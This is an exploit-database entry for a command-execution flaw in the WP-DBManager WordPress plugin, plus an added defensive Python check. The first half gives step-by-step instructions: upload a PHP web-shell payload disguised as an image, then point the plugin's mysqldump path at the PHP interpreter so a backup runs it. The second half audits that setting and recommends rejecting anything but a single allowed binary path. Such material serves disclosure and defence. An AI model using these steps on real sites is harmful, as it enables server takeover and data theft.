## https://sploitus.com/exploit?id=WPEX-ID:1C8C5861-CE87-4813-9E26-470D63C1903A
# Use any WordPress plugin that allows users to upload files. A ".php" extension is not required; for example, .jpg works (many plugins allow such extensions)
# Upload your malicious file, for example: test_rce.jpg with the following content:

<?php system("COMMAND"); ?>

# Go to "DB Options" under the WP-DBManager plugin
# Set the "Path To mysqldump" parameter to the following payload:

/usr/bin/php /var/www/blog/test_rce.jpg

# Go to "Backup DB" and click the "Backup" button
# The command is executed without any issues
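
# Added example (not part of the original write-up and not the plugin's own code): a defender-side check of a stored "Path To mysqldump" value, flagging the pattern used above where the setting carries an interpreter plus an argument instead of one binary path.
# Assumptions: a Unix host, the value has already been read from the site's settings, and the function name and allowed binary names are hypothetical.

```python
import posixpath
import re

# Assumption: the only legitimate value is one absolute path to a dump client;
# adjust ALLOWED_NAMES if the host uses a differently named binary.
ALLOWED_NAMES = {"mysqldump", "mariadb-dump"}
INTERPRETERS = {"sh", "bash", "dash", "python", "python3", "perl", "ruby", "node"}
# Anything outside plain path characters and whitespace is treated as suspicious.
UNSAFE = re.compile(r"[^A-Za-z0-9_./\s-]")


def audit_mysqldump_path(value):
    """Return a list of findings for a configured mysqldump path ([] means clean)."""
    stripped = value.strip()
    if not stripped:
        return ["empty value"]
    findings = []
    tokens = stripped.split()
    if len(tokens) > 1:
        findings.append("contains whitespace: extra tokens become command arguments")
    if UNSAFE.search(stripped):
        findings.append("contains characters outside the safe path set")
    program = tokens[0]
    if not posixpath.isabs(program):
        findings.append("not an absolute path")
    elif posixpath.normpath(program) != program:
        findings.append("path is not normalized")
    name = posixpath.basename(program)
    if name in INTERPRETERS or re.fullmatch(r"php[\d.]*(-cgi)?", name):
        findings.append("points at a script interpreter: " + name)
    elif name not in ALLOWED_NAMES:
        findings.append("unexpected binary name: " + name)
    return findings


# Constructed sample values; the second is the value from the steps above.
SAMPLES = ["/usr/bin/mysqldump", "/usr/bin/php /var/www/blog/test_rce.jpg"]

if __name__ == "__main__":
    for sample in SAMPLES:
        result = audit_mysqldump_path(sample)
        print(sample, "->", "OK" if not result else "; ".join(result))
```

# The same rule applied when the setting is saved (reject anything that is not a single allowed binary path) closes the path the steps above rely on.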